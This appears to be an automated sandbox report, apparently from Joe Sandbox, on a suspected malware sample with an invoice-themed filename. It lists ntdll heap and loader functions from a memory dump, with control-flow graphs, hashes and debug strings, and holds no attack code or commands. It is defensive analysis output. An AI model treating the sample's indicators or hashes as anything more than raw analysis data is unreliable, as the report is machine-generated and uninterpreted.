                                • Opcode ID: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                • Instruction ID: 9098bf4c1091865611e31995e4432c0f01cdde84f4a81288ed4074767029000f
                                • Opcode Fuzzy Hash: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                • Instruction Fuzzy Hash: 4C90023120248802D1157158950878A015547D0311F5DD412E5428618D86958A957121
                                Function 32522DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2 32522df0-32522dfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                • Instruction ID: 79b42483e59f6db2ebafd46d33cd99892196bd85a76985e76e78c621789691aa
                                • Opcode Fuzzy Hash: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                • Instruction Fuzzy Hash: DA90023120240413D11671585608747015947D0251F99D413E1428518D96568B56B121

                                Non-executed Functions

                                Function 325894E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 555 325894e0-32589529 556 32589578-32589587 555->556 557 3258952b-32589530 555->557 558 32589534-3258953a 556->558 559 32589589-3258958e 556->559 557->558 560 32589540-32589564 call 32529020 558->560 561 32589695-325896bd call 32529020 558->561 562 32589d13-32589d27 call 32524c30 559->562 569 32589593-32589634 GetPEB call 3258dc65 560->569 570 32589566-32589573 call 325a972b 560->570 571 325896dc-32589712 561->571 572 325896bf-325896da call 32589d2a 561->572 582 32589652-32589667 569->582 583 32589636-32589644 569->583 581 3258967d-32589690 RtlDebugPrintTimes 570->581 576 32589714-32589716 571->576 572->576 576->562 580 3258971c-32589731 RtlDebugPrintTimes 576->580 580->562 589 32589737-3258973e 580->589 581->562 582->581 585 32589669-3258966e 582->585 583->582 584 32589646-3258964b 583->584 584->582 587 32589670 585->587 588 32589673-32589676 585->588 587->588 588->581 589->562 591 32589744-3258975f 589->591 592 32589763-32589774 call 3258a808 591->592 595 3258977a-3258977c 592->595 596 32589d11 592->596 595->562 597 32589782-32589789 595->597 596->562 598 325898fc-32589902 597->598 599 3258978f-32589794 597->599 600 32589908-32589937 call 32529020 598->600 601 32589a9c-32589aa2 598->601 602 325897bc 599->602 603 32589796-3258979c 599->603 616 32589939-32589944 600->616 617 32589970-32589985 600->617 605 32589af4-32589af9 601->605 606 32589aa4-32589aad 601->606 608 325897c0-32589811 call 32529020 RtlDebugPrintTimes 602->608 603->602 607 3258979e-325897b2 603->607 611 32589ba8-32589bb1 605->611 612 32589aff-32589b07 605->612 606->592 610 32589ab3-32589aef call 32529020 606->610 613 325897b8-325897ba 607->613 614 325897b4-325897b6 607->614 608->562 641 32589817-3258981b 608->641 635 32589ce9 610->635 611->592 618 32589bb7-32589bba 611->618 620 32589b09-32589b0d 612->620 621 32589b13-32589b3d call 32588513 612->621 613->608 614->608 623 3258994f-3258996e 616->623 624 32589946-3258994d 616->624 628 32589991-32589998 617->628 629 32589987-32589989 617->629 625 32589c7d-32589cb4 call 32529020 618->625 626 32589bc0-32589c0a 618->626 620->611 620->621 647 32589d08-32589d0c 621->647 648 32589b43-32589b9e call 32529020 RtlDebugPrintTimes 621->648 634 325899d9-325899f6 RtlDebugPrintTimes 623->634 624->623 659 32589cbb-32589cc2 625->659 660 32589cb6 625->660 632 32589c0c 626->632 633 32589c11-32589c1e 626->633 638 325899bd-325899bf 628->638 636 3258998b-3258998d 629->636 637 3258998f 629->637 632->633 644 32589c2a-32589c2d 633->644 645 32589c20-32589c23 633->645 634->562 667 325899fc-32589a1f call 32529020 634->667 646 32589ced 635->646 636->628 637->628 642 3258999a-325899a4 638->642 643 325899c1-325899d7 638->643 650 3258986b-32589880 641->650 651 3258981d-32589825 641->651 656 325899ad 642->656 657 325899a6 642->657 643->634 654 32589c39-32589c7b 644->654 655 32589c2f-32589c32 644->655 645->644 653 32589cf1-32589d06 RtlDebugPrintTimes 646->653 647->592 648->562 684 32589ba4 648->684 666 32589886-32589894 650->666 664 32589852-32589869 651->664 665 32589827-32589850 call 32588513 651->665 653->562 653->647 654->653 655->654 661 325899af-325899b1 656->661 657->643 668 325899a8-325899ab 657->668 662 32589ccd 659->662 663 32589cc4-32589ccb 659->663 660->659 670 325899bb 661->670 671 325899b3-325899b5 661->671 672 32589cd1-32589cd7 662->672 663->672 664->666 674 32589898-325898ef call 32529020 RtlDebugPrintTimes 665->674 666->674 687 32589a3d-32589a58 667->687 688 32589a21-32589a3b 667->688 668->661 670->638 671->670 678 325899b7-325899b9 671->678 679 32589cd9-32589cdc 672->679 680 32589cde-32589ce4 672->680 674->562 692 325898f5-325898f7 674->692 678->638 679->635 680->646 685 32589ce6 680->685 684->611 685->635 689 32589a5d-32589a8b RtlDebugPrintTimes 687->689 688->689 689->562 693 32589a91-32589a97 689->693 692->647 693->618
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $ $0
                                • API String ID: 3446177414-3352262554
                                • Opcode ID: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                • Instruction ID: 16146015e5e0b045e5200cf4aeca2ddb21d78ea1d72a483d83ad3c7e619fd449
                                • Opcode Fuzzy Hash: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                • Instruction Fuzzy Hash: 9032F5B56083818FE310CF68C584B5BFBE5BB88348F50492DF59987350DBB5EA49CB52
                                Function 32590274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1298 32590274-32590296 call 32537e54 1301 32590298-325902b0 RtlDebugPrintTimes 1298->1301 1302 325902b5-325902cd call 324d76b2 1298->1302 1306 32590751-32590760 1301->1306 1307 325902d3-325902e9 1302->1307 1308 325906f7 1302->1308 1309 325902eb-325902ee 1307->1309 1310 325902f0-325902f2 1307->1310 1311 325906fa-3259074e call 32590766 1308->1311 1312 325902f3-3259030a 1309->1312 1310->1312 1311->1306 1315 325906b1-325906ba GetPEB 1312->1315 1316 32590310-32590313 1312->1316 1318 325906d9-325906de call 324db970 1315->1318 1319 325906bc-325906d7 GetPEB call 324db970 1315->1319 1316->1315 1320 32590319-32590322 1316->1320 1327 325906e3-325906f4 call 324db970 1318->1327 1319->1327 1323 3259033e-32590351 call 32590cb5 1320->1323 1324 32590324-3259033b call 324effb0 1320->1324 1332 3259035c-32590370 call 324d758f 1323->1332 1333 32590353-3259035a 1323->1333 1324->1323 1327->1308 1337 325905a2-325905a7 1332->1337 1338 32590376-32590382 GetPEB 1332->1338 1333->1332 1337->1311 1341 325905ad-325905b9 GetPEB 1337->1341 1339 325903f0-325903fb 1338->1339 1340 32590384-32590387 1338->1340 1342 325904e8-325904fa call 324f27f0 1339->1342 1343 32590401-32590408 1339->1343 1344 32590389-325903a4 GetPEB call 324db970 1340->1344 1345 325903a6-325903ab call 324db970 1340->1345 1346 325905bb-325905be 1341->1346 1347 32590627-32590632 1341->1347 1364 32590590-3259059d call 325911a4 call 32590cb5 1342->1364 1365 32590500-32590507 1342->1365 1343->1342 1349 3259040e-32590417 1343->1349 1362 325903b0-325903d1 call 324db970 GetPEB 1344->1362 1345->1362 1352 325905dd-325905e2 call 324db970 1346->1352 1353 325905c0-325905db GetPEB call 324db970 1346->1353 1347->1311 1350 32590638-32590643 1347->1350 1357 32590419-32590429 1349->1357 1358 32590438-3259043c 1349->1358 1350->1311 1359 32590649-32590654 1350->1359 1363 325905e7-325905fb call 324db970 1352->1363 1353->1363 1357->1358 1366 3259042b-32590435 call 3259dac6 1357->1366 1368 3259044e-32590454 1358->1368 1369 3259043e-3259044c call 32513bc9 1358->1369 1359->1311 1367 3259065a-32590663 GetPEB 1359->1367 1362->1342 1382 325903d7-325903eb 1362->1382 1395 325905fe-32590608 GetPEB 1363->1395 1364->1337 1374 32590509-32590510 1365->1374 1375 32590512-3259051a 1365->1375 1366->1358 1378 32590682-32590687 call 324db970 1367->1378 1379 32590665-32590680 GetPEB call 324db970 1367->1379 1381 32590457-32590460 1368->1381 1369->1381 1374->1375 1384 32590538-3259053c 1375->1384 1385 3259051c-3259052c 1375->1385 1401 3259068c-325906ac call 325886ba call 324db970 1378->1401 1379->1401 1391 32590472-32590475 1381->1391 1392 32590462-32590470 1381->1392 1382->1342 1398 3259056c-32590572 1384->1398 1399 3259053e-32590551 call 32513bc9 1384->1399 1385->1384 1396 3259052e-32590533 call 3259dac6 1385->1396 1393 325904e5 1391->1393 1394 32590477-3259047e 1391->1394 1392->1391 1393->1342 1394->1393 1403 32590480-3259048b 1394->1403 1395->1311 1405 3259060e-32590622 1395->1405 1396->1384 1404 32590575-3259057c 1398->1404 1415 32590563 1399->1415 1416 32590553-32590561 call 3250fe99 1399->1416 1401->1395 1403->1393 1409 3259048d-32590496 GetPEB 1403->1409 1404->1364 1410 3259057e-3259058e 1404->1410 1405->1311 1413 32590498-325904b3 GetPEB call 324db970 1409->1413 1414 325904b5-325904ba call 324db970 1409->1414 1410->1364 1423 325904bf-325904dd call 325886ba call 324db970 1413->1423 1414->1423 1417 32590566-3259056a 1415->1417 1416->1417 1417->1404 1423->1393
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 3446177414-1700792311
                                • Opcode ID: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                • Instruction ID: a2a0b79f1320000134df6f934c82201d96c3ae20c9f2aa96ab5b5f8a4d92b171
                                • Opcode Fuzzy Hash: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                • Instruction Fuzzy Hash: 63D1AC36901685DFDB06CF68C450AEDFBF1EF4A314F448899E889EB252DB749A81CF10
                                Function 324DD34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/P2$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-674978239
                                • Opcode ID: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                • Instruction ID: 0176c48ed6959e02b753351a9524f6dbef7188ffcfd57a7ba0f2c2d65773f2de
                                • Opcode Fuzzy Hash: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                • Instruction Fuzzy Hash: FEB1EEB6808351DFD715CF24C8A0B5BBBE8AF88754F41092EF988D7241DB70DA49CB92
                                Function 3258F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                • API String ID: 3446177414-1745908468
                                • Opcode ID: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                • Instruction ID: 5011db66180615c67879835883c0a26dc3e9a88173bdf25dc12e2bf533f09e98
                                • Opcode Fuzzy Hash: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                • Instruction Fuzzy Hash: FB91CC35A01685DFEB06CF68C450A9DBBF2FF49314F94845DE845EB262CBB59A81CF10
                                Function 325912ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                • API String ID: 0-3591852110
                                • Opcode ID: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                • Instruction ID: adca2647442f944874057eb9c009592627c5656055447102e503db4701e33c2e
                                • Opcode Fuzzy Hash: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                • Instruction Fuzzy Hash: 8B128D74600762DFEB158F24C450BBABBF5EF09B54F54C89DE8868B642DB34EA81CB50
                                Function 324DD08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 324DD2C3
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 324DD0CF
                                • H/P2, xrefs: 3253A843
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 324DD196
                                • @, xrefs: 324DD2AF
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 324DD146
                                • @, xrefs: 324DD313
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 324DD262
                                • @, xrefs: 324DD0FD
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/P2$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-3973197215
                                • Opcode ID: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                • Instruction ID: a89f89e457ec6d0c710f830b18ac6a0642751ec3b9192aa2f93a68e55da0f0bd
                                • Opcode Fuzzy Hash: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                • Instruction Fuzzy Hash: E3A15D76908345DFE711CF21C490B9BB7E8BF88755F40492EEA8896281DB74DA48CF93
                                Function 324F1070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                • API String ID: 3446177414-3570731704
                                • Opcode ID: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                • Instruction ID: 99427c71fda525d0ec04198dbf8e5205cd18d1848af9f9b432b1c6a5dfdd3562
                                • Opcode Fuzzy Hash: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                • Instruction Fuzzy Hash: 81924475A01368DFEB24CF28C840B99B7B5AF85754F1181EAE84DAB380DB719E81CF51
                                Function 3250D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                Download Yara Rule
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 3250D959
                                  • Part of subcall function 324E4859: RtlDebugPrintTimes.NTDLL ref: 324E48F7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1975516107
                                • Opcode ID: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                • Instruction ID: 1662c5b5b2b54eb9dd7b8ed36f88cc948dfab0bbe4a6af34d68d671336e024e7
                                • Opcode Fuzzy Hash: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                • Instruction Fuzzy Hash: EC51BC75E063459BEB04CFA4CC8479DBBB1FF44728F548559D801AB281DBB1AA82CF90
                                Function 3250DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                • API String ID: 3446177414-3224558752
                                • Opcode ID: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                • Instruction ID: 3fa13cb8eab8c6c6f1c2aeab3fca085173bfef38aa1f0f8d08414e05c33e5e48
                                • Opcode Fuzzy Hash: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                • Instruction Fuzzy Hash: 66413575A01740DFE701CF28C994B6AFBB4EF40368F1085A9E8419B791CF78AA80CF91
                                Function 32579179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                • API String ID: 0-3063724069
                                • Opcode ID: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                • Instruction ID: d69845fa119f07e25be7db1021fdfc5a6b3db40c0a7e8b4aef0ff809c81d758a
                                • Opcode Fuzzy Hash: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                • Instruction Fuzzy Hash: EFD1C7B2845395AFD721CB58C940B9BBBE8AFC4754F814A2DF98497150E770CF488BA2
                                Function 324DF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                • Instruction ID: 8627010d87469f59aa042ba9b06964094997bca4a927bbefb9bfecf39d4c71fc
                                • Opcode Fuzzy Hash: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                • Instruction Fuzzy Hash: 1B42E0756053819FD715CF24C8A0B1ABBE5FF84348F05596DE885CB352DB34EA82CB92
                                Function 325051EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: H/P2$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-2399442170
                                • Opcode ID: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                • Instruction ID: 6cdd88b4827bb418b004110b97b876870fed42ddc238f0a87d0ebeac7039e49e
                                • Opcode Fuzzy Hash: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                • Instruction Fuzzy Hash: 05F13AB6D11219EFDB15CFA8C980ADEBBB9FF48750F51446AE501A7250EA709F01CFA0
                                Function 324FB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                • Instruction ID: fb95ef0c225b60b6efa78ae9f4116da510c99bfbe8a7488b5b0dbc6d83161456
                                • Opcode Fuzzy Hash: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                • Instruction Fuzzy Hash: B3C13A71A00315BBEB148F64CC84B7EBBA5AFCA308F558069EC45AB390DFB5CA45C391
                                Function 324F0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
